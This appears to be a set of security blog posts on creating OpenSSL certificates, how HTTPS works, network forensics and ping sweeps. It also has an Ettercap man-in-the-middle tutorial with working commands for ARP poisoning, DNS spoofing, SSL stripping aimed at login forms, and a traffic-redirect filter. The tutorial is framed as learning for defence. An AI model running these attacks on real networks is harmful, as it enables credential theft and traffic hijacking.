Stop the MitM Attacks! Use Encryption!

So I’ve been having fun with Amazon’s Developer Services for user authentication. In order to get the darn thing working, Amazon requires your server to use HTTPS. This isn’t a bad thing but in order to have HTTPS, you need to get a valid certificate. Now it’s easy to create a certificate (see below) however, not as easy to get a trusted certificate. Trusted certificates are those that are authenticated by a Certificate Authority or CA. I wouldn’t really trust a self-authenticated certificate. Reminds me of online dating where everyone lies, you kind of want a third party, reliable source to tell you the truth.

lafawnduh

Here is the process to create a certificate request or CSR:

The below uses Openssl (this is native on a lot of Linux distributions, IIS on Windows handles these things differently).

Generate a RSA encrypted private key

openssl genrsa –out gen.key 2048

Create a CSR for the key

openssl req –new –key gen.key –out key.csr

Answer all the questions, leave the password blank, it’s not needed.

To get it approved:

Self (Untrusted…lame)

Remove RSA passphrase, if you don’t, the server you are running will require it upon each request

openssl rsa -in gen.key -out server.key

Generate a Year Long Certificate

openssl x509 -req -days 365 -in key.csr -signkey server.key -out key.crt

Trusted

Take it to a company such as Verisign, Thawte and RapidSSL.

Wrap it Up

You now have a certificate that can be included in your server configuration. Check your documentation for the correct implementation. There are too many server variations out there for me to describe the process.

So why do we care about HTTPS?

Well it’s secure! HTTPS stands for Hypertext Transfer Protocol Secure and utilizes SSL/TLS protocol to lockdown communications. It is used to prevent man-in-the-middle attacks with the use of encryption (preventing some of the attacks in the ettercap post). If your data is encrypted, little hacker man can’t read it. This is why whenever you are entering in confidential information, look for “https://” in the URL, else your private data is being broadcasted in clear text (there was an ettercap attack mentioned in my last post that removed the security from a Facebook form, changing the login URL from HTTPS to HTTP… be warned).

Explanation of the SSL/TLS process:

  1. Client browses to a secure site (HTTPS)
  2. Hosting server sends its certificate and public key to requesting client
  3. The client’s browser checks the server’s certificate (Looks to see if it comes from a trusted CA, relates to the correct sire, and is currently valid) – This is why you should pay attention to browser warnings, it may be trying to prevent you from going to an untrusted site.
  4. The browser uses the public key to encrypt a random symmetric encryption key and sends it to the server
  5. The server decrypts the key using its private key, the following communication between hosts is encrypted with the symmetric key
  6. Once communications have concluded, the symmetric key is discarded

The Public Key is available to anyone and anything that wants it. Anyone can retrieve it from the server. That’s all fine and dandy. The Private Key, on the other hand, is kept a secret and only the owner knows it. These keys are mathematically related, whatever is encrypted with a Public Key can only be decrypted by its corresponding Private Key. So even though a hacker can get the Public Key, he/she cannot decrypted the SSL/TLS communications because they do not have the Private Key.

So here is an example of how it all works. Jack wants to send a secret message to Jill, he doesn’t want anyone else to read the message. So Jack,encrypts his message with Jill’s Public Key. Jill is cool with giving out her Public Key to anyone who wants it because it is after all public. Jill is the only person who can decrypt the Public Key because she is the only one with its corresponding Private Key. So now Jack’s message can only be read by Jill. Even if hacker Todd gets a hold of the encrypted data, he can’t read it because he doesn’t have the decryption or Private key.

Crazy security…

Ettercap Man-in-the-Middle Fun!

Ethernet is a broadcast system. Messages sent over Ethernet from any one computer are broadcasted allowing other computers in the network to view and potentially intercept information. This vulnerability is what allows hackers to sniff packets and perform Man-in-the-Middle attacks (an attack where a hacker manipulates packets between its source and destination). What’s worse is that companies spend a lot of effort to keep hackers out but not as much to prevent hacking from within a network. These link layer type of attacks are especially dangerous because of the lack of firewalls within a network.

One type of attack is known as ARP poisoning. ARP utilizes the fact that requests are broadcasted for an IP/MAC address resolution. In simplified terms, the resolution process consists of a device on a network  looking for a corresponding machine to a given address. It broadcasts ARP packets asking, who as this specific IP? The machine with that IP then responds, I do. A hacker can personally broadcast an ARP packet and poison all device stacks in the LAN, lying about its address and re-routing traffic. There isn’t any required authentication for ARP’s allowing this attack to be successful. The attacker can also reply to an ARP before the responding machines.

Other attacks/vulnerabilities performed on the link layer that take advantage of  broadcasts include:

  • CAM Table Exhaustion
  • ARP Spoofing
  • DHCP Starvation

Ettercap is an open-source tool used to perform man-in-the-middle attacks on a local area network. This tool will intercept packets coming between the user and gateway node, changing the content. I’ll go over just a few examples of the awesome crap it can do.

I do NOT advocate using this information malicious, it’s important to learn the attacks in order to protect against them!

ARP Sniffing

This attack monitors traffic. Hackers can ‘sniff’ or view incoming packets using this ettercap function. The screenshot below shows the ARP requests created when ettercap starts up.

Execution Command:

ettercap –TqM arp:remote /<Target IP Range>/ /<Gateway IP Range>/

Arp

DNS Hijacking

This attack will divert a machine to another DNS other than the one specified. Basically, the attack focuses on placing an entry into a computer’s DNS cache. This causes a DNS to map to an incorrect IP address. DNS hijacking exploits the lack of authentication DNS uses. If the server does not validate responses locally, an incorrect entry can be inserted.

First a device will make a request for a specific DNS entered by the user. The device will ask the DNS server for the resolved IP of a DNS. With the attack, the attacker answers instead of the DNS server. The requesting device will then cache the provided IP from the attacker to the DNS called for by the user. So instead of going to Google.com one can divert traffic to hack.com

Edit Configuration File:

  • Command:

vim /usr/local/share/ettercap/etter.dns (Location in Backtrack 5 R2)

  • Add entry:

<DNS> A <Directed IP>

Execution Command:

ettercap -TqP dns_spoof -M arp:remote /<Gateway IP Range>/ 
/<Target IP Range>/

SSL MitM

This attack intercepts SSL packets, instead of credentials being passed safely to a host, credentials are sent in clear-text to the attacker. This is especially villainous.

Change the ettercap configuration file:

  • Change
ec_uid = 0               # nobody is the default
ec_gid = 0                # nobody is the default
  • Uncomment # if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp 
--dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp 
--dport %port -j REDIRECT --to-port %rport"

Execution Commands:

  • Redirect requests on port 80:

sudo iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j

REDIRECT –to-port 10000

  • Verify entry in table:

sudo iptables –list -t nat

  • Enable forwarding:

sudo echo “1” > /proc/sys/net/ipv4/ip_forward

  • Run Ettercap:

ettercap –TqM arp /<Gateway IP Range>/ /<Target IP Range>/

  • Run sslstrip to block and hide certificate:

python /pentest/web/sslstrip/sslstrip.py –a -k –f

I got you Facebook user
I got you Facebook user

Filters

Filters can be created to manipulate packets to perform a desired function. The below filter monitors all packets and if it finds TCP traffic on port 80 it will manipulate the data. The first part of the filter will commit the encoding to plaintext. The second part of the filter will then report that the requested page has changed destinations and divert the user to a new destination page. The example below diverts all web requests to 192.168.200.201. ARPs are required to be performed on a local domain.

Filter Script

if (ip.proto == TCP && tcp.dst == 80){
     if (search(DATA.data, "Accept-Encoding")){
          replace("Accept-Encoding", "Accept-Rubbish!");
          msg("Zapped!");
     }
}
if (ip.proto == TCP && tcp.src == 80){
replace("200 OK", "301 Moved Permanently
Location: http://192.168.200.201/
");
msg("redirect success\n");
}

Command to compile filter:

Etterfilter <Filter Text> -o <Compiled Filter>

Execution Command:

ettercap -Tq -F <Filter> -M arp:remote /<Target IP Range>/ 
/<Gateway IP Range>/

filter

Best Practices: Live Capture and Analysis of Network Based Evidence

Network captures and traffic analyses can provide further information and understanding on the activity of a compromised machine. This guide is specific to Linux based tools.

1.  Recommended tools for capturing network-based evidence files include:

    • Netcat (http://nmap.org/ncat) – Create TCP channels between devices that can be used to pass information.
    • Native Linux commands and tools (Explained in further detail throughout the guide)
      • Tcpdump
      • Hd (hexdump)
      • Tcpdstat (http://staff.washington.edu/dittrich/talks/core02/tools/tools.html) – Breaks down traffic patterns and provides an average of transfer rates for any given communication libpcap formatted file.
      • Snort (http://www.snort.org/) – An open source intrusion prevention and detection system.
      • Tcptrace(http://www.tcptrace.org/) – Provides data on connections such as elapsed time, bytes and segments sent/received, retransmission, round trip times, window advertisements and throughput.
      • Tcpflow (https://github.com/simsong/tcpflow)– A tool that captures and stores communications in a convenient way for protocol analysis and debugging.

2.  There are four types of information that can be retrieved with network-based evidence (Jones, Bejtlich and Rose).

    • Full content data – Full content data includes the entire network communications recorded for analysis. It consists of every bit present in the actual packets including headers and application information.
    • Session data – Data that includes the time, parties involved and duration of the communication.
    • Alert data – Data that has been predefined as interesting.
    • Statistical data – Reporting data

3.  Since data cannot be written to disk, it is best to map a network drive or use Netcat to transfer information between analyzing machine and the victim machine.

Warning: All files created or tools used need to include a checksum for validation against fraud. A checksum is basically the value of a file hash. If one character in the code or file is changed, the hash will produce a different checksum. This helps validate content. A specific application version will have a unique checksum different from all other versions of the software. A good tool to use to create checksums is File Checksum Integrity Verifier (http://support.microsoft.com/kb/841290).

4.  If using Netcat to transfer logs the following commands can be used:

Command to setup a Netcat listener on host machine: nc –v –l  –p <PORT> > <LOG FILE (FOR TCPDUMP FILE USE EXTENSION .lpc>

The port number is any port desired for the Netcat listener to listen on for communication. The log file is just a file for the data to be stored in.

Command to send data from a victim machine: <COMMAND> | nc <IP ADDRESS OF LISTENING MACHINE> <PORT>

Basically the command sends the results of a command performed on the victim machine. <COMMAND> is the command issued on the victim machine. The IP address and port are of the host machine with NetCat listening.

5.  Begin by capturing traffic.

Command: tcpdump –n –i <NETWORK INTERFACE> –s <BYTES TAKEN FROM PACKET>

Pipe the file over Netcat or send to a file on a network drive with additional parameters: -w <FILE PATH>.lpc

Warning: The file will show evidence of any unknown communications. It will not provide detail on any results or items actual obtained in the communications (Jones, Bejtlich and Rose).

6.  The tool tcpdstat can be used from the analyzing machine on the file to gain statistical data on the general flow of traffic found in the tcpdump. Statics help describe the traffic patterns and communication protocols used over a period of time.

Command: tcpdstat <TCP DUMP FILE> > <RESULTS FILE>

Warning: Telnet and FTP are communication protocols that transfer data in clear text. However, smarter intruders will use different protocols to encrypt their communications.

7.  Snort can be used to find alert data (Jones, Bejtlich and Rose).

Command: snort –c <LOCATION OF SNORT.CONF OR ANOTHER RULESET> -r <TCPDUMP FILE> -b –l <RESULT FILE PATH>

Warning: Snort will only raise flags and alerts depending on the rule set provided. Be familiar with the rules used in order to know what type of traffic may pass unnoticed by snort.

3

8.  The tool tcptrace is used to gain session information.

Command: tcptrace –n –r <TCPDUMP FILE> > <RESULT FILE PATH>

Warning: Session data can provide evidence to suspicious communications of abnormal lengths. Numerous attempted sessions over a short period of time could show signs of a brute force attack on a network (Jones, Bejtlich and Rose).

9.  Tcpflow organizes and prints out full content data on a TCP stream from a given log.

Command: tcpflow –r <TCPDUMP FILE> port <SOURCE PORT NUMBER> and <DESTINATION PORT NUMBER>

The results will be stored in a file formatted with the following name structure:

[timestampT]sourceip.sourceport-destip.destport[–VLAN][cNNNN]

To read the results a hex editor is required. Linux environments include a local tool to perform the read.

Command: hd <TCPFLOW FILENAME> > <RESULT FILE PATH>

Warning: This is a great tool that can visually show commands and inputs an intruder used in a particular stream; however, an investigator has to be aware of suspicious ports in order to retrieve quality pieces of evidence. The other tools used in this best practices help identify those communications (Jones, Bejtlich and Rose).

10.  When analyzing network-based pieces of evidence, it is import to be paranoid and research anything that is not obviously a familiar service, process, file or activity. The evidence found can help administrators understand weaknesses in the system in order to strengthen security and improve case standings in a court.

Jones, Keith J., Richard Bejtlich, and Curtis W. Rose. Real Digital Forensics. Upper Saddle River (N. J.): Addison-Wesley, 2006. Print.

Ping Sweep

nmap is a great tool to use to perform a network ping sweep, however there is an effective way to perform a ping sweep with out any additional installation. A FOR loop can be used to perform consecutive pings.

Ping Sweep FOR Loop: FOR /L %i in (<Host Number Start (0-255)>,1,<Ending Host Number (0-255)>) do @ping -n 1 <Network Prefix>.%i | find “Reply”

The FOR loop is basically saying start at a network prefix with stated starting host number value and send a ping. Once a reply as been received the first loop is finished and it continues to the next loop. After each loop, the host number increases and a ping is sent to that address on the network. For example, say the network prefix is 192.168.0 and we want to ping host numbers (3-43). We would enter 3 as our beginning host number and 43 as are finishing host number. The one in between the two parameters states to increase each address by one for each running of the for loop. This allows us to ping each host on the the specified network range, thus performing a ping sweep.

Windows Example:

The following command ping sweeps addresses in range 192.168.100.0 – 192.168.100.255

FOR /L %i in (1,1,255) do @ping -n 1 192.168.100.%i | find "Reply"

The same function can be done in the Linux Terminal.

Linux Ping Sweep:

Linux is slightly different but follows almost the same pattern.

for i in {0..255}; do ping -c 1 -t 1 <IP PREFIX>.$i | grep 'from'; done